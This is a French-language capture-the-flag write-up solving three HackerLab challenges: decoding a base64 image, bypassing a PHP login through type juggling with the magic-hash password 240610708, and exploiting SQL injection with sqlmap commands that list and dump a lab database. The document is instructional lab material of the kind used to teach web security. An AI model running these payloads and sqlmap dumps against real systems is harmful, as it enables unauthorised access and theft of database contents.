QgAAACEAAAAQgAIAABABAAAIAIAABABCAAAAIQAAABCAAAAIQAAABCACAAAQAQAACACAAAQAQgAAACEAAAAQgAIAABABAAAIAIAABABCAAAAIQAAABCAAAAIQAAABCACAAAQAQAACACAAAQAQgAAACEAAAAEIAIAABABAAAIAIAABABCAAAAIQAAABCAAAAIQAAABCACAAAQAQAACACAAAQAQgAAACEAAAAEIAIAABABAAAIAIAABABCAAAAIQAAABCAAAAIQAAABCACAAAQAQAACACAAAQAQgJBZs2Zl5MiR+fGPf5wjjjgi7du3z/nnn59x48Zl0aJFSZJly5alpKRkvX+eeuqpJEn//v3XOe3rr79eJ8tTKBTSq1evlJSUpFu3bvnss88qTTNy5MiUlJRkzJgxtZrnI488kpKSktx1111VPt8bb7yR2267LaeddloOPPDAfP/7388VV1yRp556KkuXLq12vsX1MmPGjCr/vfiz/fbb58gjj0yPHj1y/fXXZ8KECVmwYEGNr7m6ea9r+vXZRms/x6JFi1JSUpJddtkly5cvr/J5nn322Yr5ffjhh1VOM3v27JSUlOSUU07ZoGW66qqrUlJSkldffXW913ldrq+SkpLMnj17nY87+OCDc84552T06NH55z//WavnOvDAA9OjR4/ceeedee+992p1XGzofrq6uXPnZvTo0TnvvPNyzDHH5OCDD86ZZ56Ze+65J2+//XaVx1tdLsO6ju3qnnPs2LE1TvvQQw9VTHvhhRdulHnVdNy/88471c5/4MCBVe5bdbGdvtQK8CWxZMmSwi9+8YtCkmp/WrZsWZg4cWJh6dKlNU5X3c/EiRMLhUKhcN55561z2tdee61OlmvOnDlrzHfGjBmVpvnrX/9aSFIoLS0tLF++vMb5rVy5stClS5dCksKsWbPW+N3ixYsLF110UY3L1bFjxypfw+rrZfr06VX++7p+hg8fXigvL1+veVdnQ7ZRVc/Ro0ePQpLC7Nmzq3yem2++uWJ+zz77bJXTPProo4Ukhfvuu2+DlunKK68sJCm88sor673O63J9VbXPrOtxBxxwQKX9pTbP9eSTT1b7Wj/vflooFArl5eWFa665Zp2vo2/fvoW///3vG7S+alqG2h7b1T3n8ccfX1i5cmWV061YsaLQqVOnimkHDBiwUeZV03F/7rnnFlatWlXlc1x88cVV7lt1sZ2+zJwB5Eth6dKlueCCCzJ48OCUlpbm8ccfzz/+8Y8sW7YsK1asyKJFi/Lyyy/npJNOynHHHZfy8vIUCoVKP6+99lqS5OKLL67y98cee+wazzt9+vQqpysUCjnkkEPqZNkmT56cJBk+fHiS5Omnn640ze67754+ffrkhRdeyNtvv13j/N5999089thjOfXUU7P33ntX/Psnn3ySc889N8OGDUunTp3y3HPPZdGiRVm5cmU++eSTzJgxIwMHDszkyZPzne98J7NmzVrvZVl9fa1YsSIff/xxZs2alQceeCDNmzdPv379ctFFF9X67M36PueGbKPiNn/33Xcr/e6zzz7Lww8/nAEDBmTfffet9qzvyy+/nCQ56KCDNvljqab1VSgUss8++6zzcZ9++mnmzJmTfv36Zfr06RkwYECVZ1BXf8yyZcsyb968XHfddUmSM844IwsXLqz0mLrYT5cuXZrzzz8/gwYNSmlpaf74xz+mrKwsn376aVatWpXy8vLMnj07Y8aMyXPPPZebbrqpVuurtsuwPsd2VS655JI8+uij1R6DM2fOzBNPPJHLLrtso86rOu3atcvtt99e5Rnsdb2v19V2cgkYtlBjxozJiBEj8oMf/CDjxo1L586ds+OOO6Z+/fqpV69emjZtmrZt2+bGG2/MpEmTUlJSslks16effppbbrklHTp0SO/evdOpU6dce+21KS8vrzTtqaeemiR54oknapxn8TL2mWeeucZ6GDVqVMaMGZMTTzwxY8aMSYcOHdK0adNsvfXWadSoUVq1apWhQ4fmlltuyYIFCzJgwIAsW7Zsg5etXr16adKkSfbZZ5+ceeaZmTZtWtq1a5c77rgjDz/88CazDYrR9uc//7nS7z766KNMmTIlRx11VHr06JGxY8dWuhS1fPny3HfffUmSvfba60txPDZo0CB77bVXrrrqqrRs2TITJkzInDlzanxM/fr1s9NOO+X8889Px44ds2DBgiovCdbFfjp69OiMGDEiJ554YsaPH58uXbpk5513ToMGDbLVVlulcePG2XvvvXPaaadl6tSp+fa3v12r5a7tMqzvsb22448/PknyzDPP1HiMd+nSZaPOqzqXX355kuSmm27KypUra/24L2o7CUDYQixcuDA/+9nPkiRXX311vva1r1U7bUlJSY466qh89atf3SyW7fXXX8+bb76Zvn37plGjRjn77LNTVlaWV155pdK0bdu2TfPmzfPLX/4yixcvrnJ+5eXlGTZsWJLk8MMPX2MdXnTRRUmSIUOGpFmzZlU+fuutt87ZZ5+d4447Lo899liVUbShdt1119x8881JkkGDBtXqg3Bj2HPPPZMk9913X6WzWMVxXvvtt1/atGmTyZMn56OPPlpjmg8++CBlZWXp3r17vvKVr3ypjs1mzZrlhBNOSJJ1jvFcPaKK++Ynn3xS6Vj/vPvpwoULM2DAgIr3i3W9F+ywww458cQT12u5a1qGDTm219aiRYtcccUVueGGGyrNv7y8PNdcc02GDh2ar3/96xt1XtVp1apVbrjhhowZMyZTp06t9fv6F72dBCBs5mbMmJElS5akR48eadWq1Ra1bOPHj0+SlJaWJknFX7i///3vK03bpEmTDBw4MEuWLMm0adOqnN8rr7ySsrKyDB06dI0Pz+nTp2fJkiXp3r179t9//xpfU6NGjdK3b98kyfPPP1+ny9umTZu0bds2ZWVlmTt37iaxDZo2bZqePXumrKwsH3zwQaUP8ebNm2eXXXbJvvvumySVznQVLx136tTpS32c1vas+/LlyysiYe0P/brYT4vz6NmzZ/bbb78vZFlrWoYNObar0qVLl8ydO7di2Mrqx/iCBQvSuXPnWr/eupxXdbp3754kufbaa2t15WBjbCcBCJu54iWWjh07bjaXdmtj/vz5ufbaa3PWWWdlt912S5LstNNO6d+/f4YPH56ysrJKj/nud7+bJNV+G7h4afV73/veGv9ejJajjz66Vuuw+Ib86KOP1uky16tXL127dk2SzJs3b5PZFsccc8waMZf85xuc48aNS+/evdOwYcPssssuadmyZd544401HluM8c1h/F9dW7hwYcaNG5ck6zyDtHz58sybNy833nhjpkyZkq5du1b6g64u9tPiPL7zne98IeG3rmXY0GN7ba1bt07r1q3zhz/8odIx3rZt2/Xa3+pyXtXZcccdc/fdd2fChAmZNGnSOqf/IreTAIQt6EOmpr+0v0gHHHBAlbfK+PWvf/255/3CCy8k+e/YvqJu3bolSaZMmVLpMa1atUrnzp1z//335/3331/jd/Pmzcutt96a0tLSSm/oxXVY0+Xz1W2//fZJkpdeemm9xvTURosWLZIkH3/88SazjQ488MAk//0yR/Kf8X+TJk2quNRXv379/OhHP8ojjzySQqGQJFmxYkVGjRqV5L+XktfnNRZ/rrzyyv/5Pl28vUttLFu2LO+9916uvPLKlJWVpVOnTlWOf1z9uRo0aJCWLVtm0KBB6d+/f+68887Ur1+/zvfT4q2gqrt8/Pzzz1e57H/729/Wub5qswwbemyvrUGDBjn//PNz3XXXZf78+Wsc4/369avyeTfGvGrSrVu3tGzZMkOGDMn//d//1ThtXW8nAQhbsC3p7N+qVaty7733JkkOO+ywNX7Xpk2bNG/ePHfccUdWrFixxu+KY5+S5Lnnnqv0hpkkP/3pT7PNNttssuuwGE+b0vYsxtu9995bMQ6weIZi9TM8bdu2XWMc4AcffJC5c+emR48eadq06RZ9/K0eQg0bNszee++dW2+9Nfvuu29uuummNGjQoNZno84+++yKPwTqej/dGPtXTcuwocd2VYpnx1588cUkqbjs3KFDh/V+zXU5r+o0a9Ysw4YNy0svvZQJEyZsdu8DAhA2McW/EP/1r39t9Oeu7pYZxbFHG2rmzJl57LHHcvXVV1cKh+222y6XXHJJpkyZUuUtX4pjioYPH14RKytXrqy46XNVb+jruw6LZ+fatWuXevXq1ek6LX5ZoEmTJpvMNmratGl69eq1xjjAN998M02aNKm4hJf895JjMQ6Lt9YoXppf39dY/NmYZwBrei1rX96uKQZ79+6dUaNGZcqUKdWO11v9ucrLy/Pcc8+lvLw8paWlVX57ti720+I8qrs9yxFHHLHGMp988sm1Xl+1WYbPc2xX9YdJ9+7dc//992f58uUZMWJEevbsmd13332D/sipq3nVpEuXLjn00ENz6aWXVvtltS9iOwlA2AIV70s2efLkir8aN3dPPvlkkuTSSy+t8jLHBRdckCR5/PHHKz22RYsWGThwYKZNm5a33nqr4kNq0qRJ6devX1q2bFnpMcX7AT799NO1WofFsXDFW0jUlZUrV1YMjq/qdf4vrT4OsFAoZPz48enTp08aNWpUMc2uu+6aJk2aVNwPsHjJuHgJeUu2egi98847GTFiRM4444w0b968Vo9v3LhxOnTokJEjR2bJkiW5/PLLKw0vqIv9tDiPZ599ts7XQW2W4fMc22srKSnJ6aefnvHjx2f06NF54okn0r179w06a1aX86pJkyZNctV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


Nous voyons qu'il s'agit d'une image (présence de "data:image/png;base64" au début). 

Essayons de la récupérer avec un outils en ligne de décodage d'image base64 

https://codebeautify.org/base64-to-image-converter

 

Ainsi nous avons notre CTF

EXPLOITATION D'UNE VULNERABILITE PHP Type Juggling Authentication Bypass (La porte du couvent)

ÉNONCÉ DE L’ÉPREUVE

La porte du couvent

          Dans leur élan pour secourir les dernières victimes du célèbre Gayeman DJAKPATAGLO, les cyber-amazones font face à la porte d'un couvent impénétrable. http://hackerlab.bj:8001/web03/web03_frjofjzefzf.html
Point: 400
Type: Web

Qu'est ce qu'une vulnérabilité  PHP Type Juggling ?

        Type Juggling est d’abord une vulnérabilité présente dans d'autre langage mais en PHP spécialement.
- il a deux principaux modes de comparaison appeler loose (==) et strict (===).
- Les comparaisons loose (==) ont un ensemble de règles de conversion d’opérandes pour faciliter la tâche des développeurs. Certaines d’entre elles sont un peu étranges. 
         Le PHP Type Juggling est dû à un problème d'opérations loose (==) par rapport à des opérations strict (===).  
Dans cette épreuve nous somme confronté à une page web d'authentification basic.

 En entrant un nom d'utilisation et un mot de passe quelconque par exemple admin/admin on nous avons:

La présence de == à la fin de la chaîne de caractères nous indique qu'il pourait être un encodage base64.

Essayons de décoder. Nous disposons de deux options.

1-) le faire localement par exemple avec l’outil graphique de décodage de Zed Attaque Proxy d'OWASP

2-) Le faire en ligne sur le site https://www.dcode.fr/code-base-64 par exemple

Dans les deux cas, nous avons le même résultats: 

vous n'êtes plus loin du login: e7791ece9da5a6e3f0aa6ba77536fbc6b7780895
 
Il s’agit cette fois si d'un hash. Nous allons donc l'identifier et le décrypter. Nous avons préférer le faire en ligne respectivement sur les sites https://www.onlinehashcrack.com/hash-identification.php#results et https://www.dcode.fr/hash-sha1 .Il s'agit d'un Hash SHA-1.
 
Après décryptage nous avons : amazone 

Nous venons d'avoir le non d'utilisateur (amazone)
S’agissant de la vulnérabilité PHP Type Juggling, un exploit est disponible pour l'authentication Bypass:
PHP Juggling type and magic hashes :
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Type%20Juggling

En mettant le “Magic” Number / String  240610708 comme mot de passe, nous avons notre CTF

DETECTION ET EXPLOITATION D'UNE FAILLE SQL (Porte du couvent 2)

ÉNONCÉ DE L’ÉPREUVE:

Porte du couvent 2

Point: 400 
Type: Web 
  
DETECTION
           La faille SQLi, abréviation de SQL Injection, soit injection SQL en français, est un groupe de méthodes d'exploitation de faille de sécurité d'une application interagissant avec une base de données. Elle permet d'injecter dans la requête SQL en cours un morceau de requête non prévu par le système et pouvant en compromettre la sécurité. (source: https://fr.wikipedia.org/wiki/Injection_SQL).
 

1-) Première méthode

           Pour détecter un site qui a une faille SQL, il suffit simplement d'envoyer des requêtes contenant des caractères spéciaux du SQL, comme « ' », « " », etc. En général, si le site est sensible à l'injection SQL, un message d'erreur va être affiché. Très souvent, ce message contient la requête qui a été exécutée, ce qui facilite le travail de l'attaquant en lui donnant des indices sur le schéma de la base.

 Essayons: Insérons un apostrophe dans le champ nom

Et voila ! Suite à la saisie d'une simple quote dans ce formulaire, la requête devient invalide et provoque l'affichage d'un message d'erreur:

 Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/porte_couvent/index.php on line 64
code de confirmation=

 Ce site est donc vulnérable et nous apprenons que le serveur SQL est MySQL et l'url vulnerable est: http://qualif.hackerlab.bj/porte_couvent/index.php?nom=dd&submit=

          En toute honnêteté, les erreurs de programmation SQL de ce genre sont de plus en plus rares et les chances de détecter une faille SQL par cette technique est de plus en plus mince (le serveur où le script s'exécute peut être configuré pour ne pas afficher de message d'erreur (Mettre display_errors = Off dans php.ini par exemple) ou bien utiliser des try/catch (C#, Java, PHP5 ...) pour gérer les exceptions, les anomalies de fonctionnement et donner l'impression d'un fonctionnement normal de l'application.).

          

2-) Deuxième méthode:

          En réalité nous avions utiliser le scanner de vulnérabilité présent dans les frameworks d'exploitation. Un framework nous apporte une approche standardisée et structurée pour l’attaque des cibles. Il existe plusieurs frameworks pour le hacking des applications web, notamment w3af, Burp Suite, Zed Attack Proxy (ZAP) d’OWASP, Websecurify et Paros. Quelque soit l’outil retenu, hormis de subtiles différences (tout au moins du point de vue des bases), ils offrent tous une fonctionnalité comparable et constituent un excellent véhicule pour les attaques sur le Web. Nous avions choisis Zed Attack Proxy (ZAP) d’OWASP et le résultat du scan de vulnérabilité nous indique la présence d'une vulnérabilité d'injection SQL.

  

Nous apprenons  ici les choses suivantes en plus: 
Méthode vulnérable: GET
Paramètre vulnérable: nom
Technique d'attaque:  Boolean-based blind

 II- EXPLOITATION DE LA FAILLE SQLi

             Les informations obtenir dans la première méthode de détection sont largement suffisante pour notre exploitation.

Invoquons sqlmap avec la commande suivante: 

 sqlmap -u 'http://qualif.hackerlab.bj/porte_couvent/index.php?nom=dd&submit=' --dbs

 où -u permet de spécifier l'url cible et --dbs permet de lister toutes les bases de données disponibles.

 Nous avons comme resultats:
 

 Maintenant essayons de recupéré les données de la base de donnée "qualif" avec cette commande:

sqlmap -u 'http://qualif.hackerlab.bj/porte_couvent/index.php?nom=dd&submit=' -D qualif --dump

 où -D permet d'entré dans la base de donnée "qualif" et --dump recupère les données.
 
  Nous avons comme resultats:

 Et voila enfin notre CTF:  CTF_SQL_DANGEROUS_INJECTOR_

         Mais le manque d’ordre et de structure déclenche souvent de frustration et d'échec. C'est pourquoi nous conseillons de se servir des résultats de la deuxième méthode comme point de départ de l'exploitation. Autrement dit, la sortie du scan sera utilisée pour façonner, focaliser et diriger votre attaque. Une explication détailler des fonctionnalités de l'outil sqlmap est disponible ici. 
         Avec cette méthode vous gagner beaucoup de temps et vous êtes plus sur de ce que vous faite.
   

sqlmap est un outil très puissant et hautement personnalisable, je le recommande vivement si vous ne l'utilisez pas déjà.